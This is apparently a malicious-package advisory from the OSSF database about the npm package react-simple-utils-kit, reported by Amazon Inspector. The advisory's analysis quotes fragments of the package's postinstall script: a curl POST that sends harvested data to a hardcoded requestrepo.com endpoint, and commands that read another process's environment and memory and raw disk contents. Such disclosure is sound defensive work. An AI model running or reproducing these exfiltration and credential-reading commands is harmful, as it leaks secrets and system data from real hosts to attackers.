MAL-2026-6303
Vulnerability from ossf_malicious_packages
Published
2026-06-23 14:46
Modified
2026-06-23 15:35
Summary
Malicious code in react-simple-utils-kit (npm)
Details
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (038aa6bccd8008fec1f309d718e53dd4b89e4ca15a976c6a80652e0dd58a5b58)
Package advertises itself as 'a simple date formatting utility for React projects' (3-function index.js), but ships a postinstall.js that runs on every npm install and performs an extensive reconnaissance + credential-harvest sweep against the installer's host, POSTing each result over plain HTTP to a hardcoded attacker endpoint at http://2e3bkumw.requestrepo.com (a one-shot request-interception domain unrelated to any legitimate publisher). postinstall.js:8 hardcodes const BURL = 'http://2e3bkumw.requestrepo.com' and postinstall.js:16 invokes execSync(\curl -s -m 8 -X POST -d @${tmpFile} ${BURL}/${key}...`)to ship results. Collected data includes: process capabilities and ptrace scope, strace attach against PID 2, raw memory reads of another process viaxxd /proc/2/mem, that process's environment block viacat /proc/2/environ(commonly containing CI tokens and cloud credentials),/proc/2/cmdline,ps aux, listening-port enumeration, MCP probing on localhost:9000, and raw-disk reads from/dev/vdb. The package's name targets React developers via a date-utility cover story (empty author field, Chinese comment绕过能力探测= 'capability-detection bypass'); none of this behavior is consistent with the advertised purpose. Installer harm is concrete and immediate: any host runningnpm install react-simple-utils-kit` leaks process-tree secrets, environment variables of other running processes, kernel/container introspection data, and raw block-device contents to attacker infrastructure.
CWE
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
- CWE-506 - The product contains code that appears to be malicious in nature.
Credits
{
"affected": [
{
"database_specific": {
"cwes": [
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
},
{
"cweId": "CWE-506",
"description": "The product contains code that appears to be malicious in nature.",
"name": "Embedded Malicious Code"
}
],
"indicators": {
"evidence_files": [
{
"path": "postinstall.js",
"sha256": "b732eaa4ee74b20bf8e24f406b074df840aec80e04fbca2eeb87a35077c08083",
"tlsh": "6971c6f9e9f39f70763a61a4315e60499efffc2a31527bd0e9684d68038de4a1123243"
},
{
"path": "package.json",
"sha256": "b5e4ea02a051ecf715a8a71fddead93d22a6b2f1f61b1ede3ba0e1d04e8b6e96",
"tlsh": "76e02614c9014f336fe8066948270912ba985e0b060c3c2c3387900c578f6ff80fe30d"
}
],
"package_integrity": [
{
"filename": "react-simple-utils-kit-1.3.2.tgz",
"hashes": {
"sha1": "d2707e8326457e097166a992b3679117b549bbb6",
"sha512_sri": "sha512-KcoQFBGF1NUtAzLMfcusQII729VIn/mUeQPkWYsLrVwB0rw9XLk8PIC+Z/kCA87z/eQInAiPWhd0V3VmpOaptw=="
}
}
]
}
},
"package": {
"ecosystem": "npm",
"name": "react-simple-utils-kit"
},
"versions": [
"1.3.2",
"1.2.2",
"1.0.2",
"1.4.2",
"1.3.3",
"1.3.1",
"1.0.5",
"1.0.1",
"1.3.0",
"1.4.0",
"1.1.0",
"1.4.1",
"1.0.4",
"1.2.0",
"1.0.0",
"1.2.1"
]
}
],
"credits": [
{
"contact": [
"inspector-research@amazon.com"
],
"name": "Amazon Inspector",
"type": "FINDER"
}
],
"database_specific": {
"malicious-packages-origins": [
{
"id": "IN-MAL-2026-007224",
"import_time": "2026-06-23T15:33:52.589644574Z",
"modified_time": "2026-06-23T14:46:47Z",
"sha256": "038aa6bccd8008fec1f309d718e53dd4b89e4ca15a976c6a80652e0dd58a5b58",
"source": "amazon-inspector",
"versions": [
"1.3.2"
]
},
{
"id": "IN-MAL-2026-007213",
"import_time": "2026-06-23T15:33:51.59318304Z",
"modified_time": "2026-06-23T14:46:38Z",
"sha256": "8886d4d16de552939e01d8bd472dd2b8dce46a0abf77d253cbcb09dae4830373",
"source": "amazon-inspector",
"versions": [
"1.2.2"
]
},
{
"id": "IN-MAL-2026-007215",
"import_time": "2026-06-23T15:33:51.691286744Z",
"modified_time": "2026-06-23T14:46:39Z",
"sha256": "b0b31ec7c4d366cc5f7f5a46466f414bba1a641964c6b997d30f9220f186bbbd",
"source": "amazon-inspector",
"versions": [
"1.0.2"
]
},
{
"id": "IN-MAL-2026-007209",
"import_time": "2026-06-23T15:33:51.303269095Z",
"modified_time": "2026-06-23T14:46:34Z",
"sha256": "b1ec8b00031d31e45f8ed1936395bd52f1ea16df4e652521b3732bafdbbff604",
"source": "amazon-inspector",
"versions": [
"1.4.2"
]
},
{
"id": "IN-MAL-2026-007219",
"import_time": "2026-06-23T15:33:52.244875464Z",
"modified_time": "2026-06-23T14:46:42Z",
"sha256": "bfeef9da283d7f26660e055fd2f70cf71c1231f13a3029971689bf9082098e88",
"source": "amazon-inspector",
"versions": [
"1.3.3"
]
},
{
"id": "IN-MAL-2026-007220",
"import_time": "2026-06-23T15:33:52.371047009Z",
"modified_time": "2026-06-23T14:46:43Z",
"sha256": "2e293c75200e773ed6bef24f23d483ffc71565dd465336318f240f06be8eb3ff",
"source": "amazon-inspector",
"versions": [
"1.3.1"
]
},
{
"id": "IN-MAL-2026-007218",
"import_time": "2026-06-23T15:33:52.190736749Z",
"modified_time": "2026-06-23T14:46:42Z",
"sha256": "66fb37d80d5b57c42447704336d28fa810af4c46c2cee5f2abac2452dd3b469b",
"source": "amazon-inspector",
"versions": [
"1.0.5"
]
},
{
"id": "IN-MAL-2026-007217",
"import_time": "2026-06-23T15:33:51.821002204Z",
"modified_time": "2026-06-23T14:46:41Z",
"sha256": "95a5ed56bbe208d78882a1026d8aa0b9e8659b3a85c1b9a849a0718907e1c342",
"source": "amazon-inspector",
"versions": [
"1.0.1"
]
},
{
"id": "IN-MAL-2026-007210",
"import_time": "2026-06-23T15:33:51.357235772Z",
"modified_time": "2026-06-23T14:46:35Z",
"sha256": "963d8f444d49da2d58e2c58cceff09bf9c685f38b03fd4286f8521e9b4701b9a",
"source": "amazon-inspector",
"versions": [
"1.3.0"
]
},
{
"id": "IN-MAL-2026-007211",
"import_time": "2026-06-23T15:33:51.499290605Z",
"modified_time": "2026-06-23T14:46:36Z",
"sha256": "e682e830cea8fa19e03a89aab70edc2259dbd0744d335cfc40de5ca0be2e2ca3",
"source": "amazon-inspector",
"versions": [
"1.4.0"
]
},
{
"id": "IN-MAL-2026-007222",
"import_time": "2026-06-23T15:33:52.475405356Z",
"modified_time": "2026-06-23T14:46:44Z",
"sha256": "716430e4a7dd41de65f4f46768c7db4ca994be72406c8e312a5955f60d4835d8",
"source": "amazon-inspector",
"versions": [
"1.1.0"
]
},
{
"id": "IN-MAL-2026-007212",
"import_time": "2026-06-23T15:33:51.540320712Z",
"modified_time": "2026-06-23T14:46:36Z",
"sha256": "8af4223f1220931d40aa0369b3d1590079e6c047f18ad29051f4fba20143ca88",
"source": "amazon-inspector",
"versions": [
"1.4.1"
]
},
{
"id": "IN-MAL-2026-007216",
"import_time": "2026-06-23T15:33:51.773768607Z",
"modified_time": "2026-06-23T14:46:40Z",
"sha256": "a1e740ad238b57435991e84637e4bf314c9154498ec231f9492c313ae364c71b",
"source": "amazon-inspector",
"versions": [
"1.0.4"
]
},
{
"id": "IN-MAL-2026-007223",
"import_time": "2026-06-23T15:33:52.534609606Z",
"modified_time": "2026-06-23T14:46:45Z",
"sha256": "9dda662ed01f939793fc3a67b24c2078f4ba731817f72623ba2b177b23f8a52f",
"source": "amazon-inspector",
"versions": [
"1.2.0"
]
},
{
"id": "IN-MAL-2026-007214",
"import_time": "2026-06-23T15:33:51.639177167Z",
"modified_time": "2026-06-23T14:46:38Z",
"sha256": "c78fcb17e3152afdb3f27b202c9e7d19735460a1bb6743ecf61e3e379a273eea",
"source": "amazon-inspector",
"versions": [
"1.0.0"
]
},
{
"id": "IN-MAL-2026-007221",
"import_time": "2026-06-23T15:33:52.434312415Z",
"modified_time": "2026-06-23T14:46:43Z",
"sha256": "d0dab6842ed9ed6871c0bc982363bd1ede197cbe269eb124a7ebc16f1d9dca0e",
"source": "amazon-inspector",
"versions": [
"1.2.1"
]
}
]
},
"details": "\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (038aa6bccd8008fec1f309d718e53dd4b89e4ca15a976c6a80652e0dd58a5b58)\nPackage advertises itself as \u0027a simple date formatting utility for React projects\u0027 (3-function index.js), but ships a postinstall.js that runs on every `npm install` and performs an extensive reconnaissance + credential-harvest sweep against the installer\u0027s host, POSTing each result over plain HTTP to a hardcoded attacker endpoint at http://2e3bkumw.requestrepo.com (a one-shot request-interception domain unrelated to any legitimate publisher). postinstall.js:8 hardcodes `const BURL = \u0027http://2e3bkumw.requestrepo.com\u0027` and postinstall.js:16 invokes `execSync(\\`curl -s -m 8 -X POST -d @${tmpFile} ${BURL}/${key}...\\`)` to ship results. Collected data includes: process capabilities and ptrace scope, strace attach against PID 2, raw memory reads of another process via `xxd /proc/2/mem`, that process\u0027s environment block via `cat /proc/2/environ` (commonly containing CI tokens and cloud credentials), `/proc/2/cmdline`, `ps aux`, listening-port enumeration, MCP probing on localhost:9000, and raw-disk reads from `/dev/vdb`. The package\u0027s name targets React developers via a date-utility cover story (empty author field, Chinese comment `\u7ed5\u8fc7\u80fd\u529b\u63a2\u6d4b` = \u0027capability-detection bypass\u0027); none of this behavior is consistent with the advertised purpose. Installer harm is concrete and immediate: any host running `npm install react-simple-utils-kit` leaks process-tree secrets, environment variables of other running processes, kernel/container introspection data, and raw block-device contents to attacker infrastructure.\n",
"id": "MAL-2026-6303",
"modified": "2026-06-23T15:35:56Z",
"published": "2026-06-23T14:46:34Z",
"references": [
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.3.2"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.2.2"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.0.2"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.4.2"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.3.3"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.3.1"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.0.5"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.0.1"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.3.0"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.4.0"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.1.0"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.4.1"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.0.4"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.2.0"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.0.0"
},
{
"type": "PACKAGE",
"url": "https://www.npmjs.com/package/react-simple-utils-kit/v/1.2.1"
}
],
"schema_version": "1.7.4",
"summary": "Malicious code in react-simple-utils-kit (npm)"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…